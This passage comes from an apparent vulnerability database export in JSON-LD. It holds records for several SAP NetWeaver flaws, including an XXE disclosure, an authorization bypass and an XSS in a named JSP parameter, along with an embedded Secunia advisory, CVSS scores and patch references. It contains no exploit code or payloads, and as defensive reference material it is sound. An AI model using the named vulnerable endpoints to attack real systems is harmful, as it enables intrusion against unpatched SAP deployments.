"version": "7.5"
}
],
"sources": [
{
"db": "BID",
"id": "95373"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "95373"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Java is prone to an information disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\nSAP NetWeaver 7.5 is vulnerable.",
"sources": [
{
"db": "BID",
"id": "95373"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "95373",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "95373"
}
]
},
"id": "VAR-201701-1184",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:07:06.483000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://erpscan.com/advisories/erpscan-17-004-sap-netweaver-java-7-5-xxe/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2347439"
}
],
"sources": [
{
"db": "BID",
"id": "95373"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "95373"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-01-10T00:00:00",
"db": "BID",
"id": "95373"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-01-12T00:14:00",
"db": "BID",
"id": "95373"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "95373"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver XML External Entity Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "95373"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "95373"
}
],
"trust": 0.3
}
}
var-201704-1647
Vulnerability from variot
SAP NetWeaver is prone to an authorization-bypass vulnerability. Attackers can exploit this issue to gain unauthorized access and obtain sensitive information or elevate privileges. This may aid in further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-1647",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "97568"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "97568"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an authorization-bypass vulnerability.\nAttackers can exploit this issue to gain unauthorized access and obtain sensitive information or elevate privileges. This may aid in further attacks.",
"sources": [
{
"db": "BID",
"id": "97568"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "97568",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "97568"
}
]
},
"id": "VAR-201704-1647",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:52:37.101000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2423486"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/04/11/sap-security-patch-day-april-2017/"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/05/09/sap-security-patch-day-may-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "97568"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "97568"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-11T00:00:00",
"db": "BID",
"id": "97568"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-23T16:23:00",
"db": "BID",
"id": "97568"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "97568"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver ADBC Demo Programs Remote Authorization Bypass Vulnerability",
"sources": [
{
"db": "BID",
"id": "97568"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "97568"
}
],
"trust": 0.3
}
}
var-201202-0346
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp in the Internet Sales (crm.b2b) module in SAP NetWeaver 7.0 allows remote attackers to inject arbitrary web script or HTML via the _loadPage parameter. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a vulnerability in SAP NetWeaver. information. The SAP NetWeaver com.sap.aii.mdt.amt.web.AMTPageProcessor servlet error can be exploited to leak certain Adapter monitoring information. SAP NetWeaver is prone to multiple input-validation vulnerabilities, including: 1. A cross-site scripting vulnerability 2. Multiple directory traversal vulnerabilities 3. Multiple information-disclosure vulnerabilities Attackers can exploit these issues to execute arbitrary script code in the context of the website, steal cookie-based authentication information, and disclose sensitive information. Other attacks are also possible. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm
TITLE: SAP NetWeaver Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA47861
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47861/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47861
RELEASE DATE: 2012-02-21
DISCUSS ADVISORY: http://secunia.com/advisories/47861/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/47861/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47861
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Digital Security Research Group has reported some vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks and by malicious users and malicious people to disclose sensitive information. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences.
Successful exploitation of vulnerabilities #1 and #2 may require permission to view logs.
The vulnerabilities are reported in version 7.0. Other versions may also be affected.
SOLUTION: Apply SAP Security Notes 1585527 and 1583300.
PROVIDED AND/OR DISCOVERED BY: Dmitriy Chastukhin, Digital Security Research Group.
ORIGINAL ADVISORY: Digital Security Research Group: http://dsecrg.com/pages/vul/show.php?id=412 http://dsecrg.com/pages/vul/show.php?id=413 http://dsecrg.com/pages/vul/show.php?id=414 http://dsecrg.com/pages/vul/show.php?id=415 http://dsecrg.com/pages/vul/show.php?id=416
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201202-0346",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 5.7,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001570"
},
{
"db": "NVD",
"id": "CVE-2012-1290"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-444"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1290"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitriy Chastukhin of Digital Security Research Group.",
"sources": [
{
"db": "BID",
"id": "52101"
}
],
"trust": 0.3
},
"cve": "CVE-2012-1290",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2012-1290",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-1290",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201202-444",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001570"
},
{
"db": "NVD",
"id": "CVE-2012-1290"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-444"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp in the Internet Sales (crm.b2b) module in SAP NetWeaver 7.0 allows remote attackers to inject arbitrary web script or HTML via the _loadPage parameter. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a vulnerability in SAP NetWeaver. information. The SAP NetWeaver com.sap.aii.mdt.amt.web.AMTPageProcessor servlet error can be exploited to leak certain Adapter monitoring information. SAP NetWeaver is prone to multiple input-validation vulnerabilities, including:\n1. A cross-site scripting vulnerability\n2. Multiple directory traversal vulnerabilities\n3. Multiple information-disclosure vulnerabilities\nAttackers can exploit these issues to execute arbitrary script code in the context of the website, steal cookie-based authentication information, and disclose sensitive information. Other attacks are also possible. ----------------------------------------------------------------------\n\nSecunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March\nListen to our Chief Security Specialist, Research Analyst Director, and Director Product Management \u0026 Quality Assurance discuss the industry\u0027s key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA47861\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/47861/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861\n\nRELEASE DATE:\n2012-02-21\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/47861/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/47861/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nDigital Security Research Group has reported some vulnerabilities in\nSAP NetWeaver, which can be exploited by malicious people to conduct\ncross-site scripting attacks and by malicious users and malicious\npeople to disclose sensitive information. \nThis can be exploited to disclose the contents of arbitrary files via\ndirectory traversal sequences. This can be exploited to disclose the contents of\narbitrary files via directory traversal sequences. \n\nSuccessful exploitation of vulnerabilities #1 and #2 may require\npermission to view logs. \n\nThe vulnerabilities are reported in version 7.0. Other versions may\nalso be affected. \n\nSOLUTION:\nApply SAP Security Notes 1585527 and 1583300. \n\nPROVIDED AND/OR DISCOVERED BY:\nDmitriy Chastukhin, Digital Security Research Group. \n\nORIGINAL ADVISORY:\nDigital Security Research Group:\nhttp://dsecrg.com/pages/vul/show.php?id=412\nhttp://dsecrg.com/pages/vul/show.php?id=413\nhttp://dsecrg.com/pages/vul/show.php?id=414\nhttp://dsecrg.com/pages/vul/show.php?id=415\nhttp://dsecrg.com/pages/vul/show.php?id=416\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1290"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001570"
},
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "PACKETSTORM",
"id": "110028"
}
],
"trust": 4.68
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "52101",
"trust": 4.9
},
{
"db": "SECUNIA",
"id": "47861",
"trust": 4.7
},
{
"db": "NVD",
"id": "CVE-2012-1290",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001570",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-0825",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0822",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0826",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0827",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0823",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201202-444",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "110028",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001570"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1290"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-444"
}
]
},
"id": "VAR-201202-0346",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
}
],
"trust": 2.67111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 2.4
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
}
]
},
"last_update_date": "2023-12-18T12:10:13.971000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability (CNVD-2012-0825)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10773"
},
{
"title": "Patch for SAP NetWeaver File Read Vulnerability (CNVD-2012-0822)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10771"
},
{
"title": "Patch for SAP NetWeaver Information Disclosure Vulnerability (CNVD-2012-0826)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10774"
},
{
"title": "Patch for SAP NetWeaver Information Disclosure Vulnerability (CNVD-2012-0827)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10775"
},
{
"title": "Patch for SAP NetWeaver File Read Vulnerability (CNVD-2012-0823)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10772"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001570"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001570"
},
{
"db": "NVD",
"id": "CVE-2012-1290"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://secunia.com/advisories/47861/"
},
{
"trust": 2.0,
"url": "http://dsecrg.com/pages/vul/show.php?id=414"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/47861"
},
{
"trust": 1.6,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/52101"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1583300"
},
{
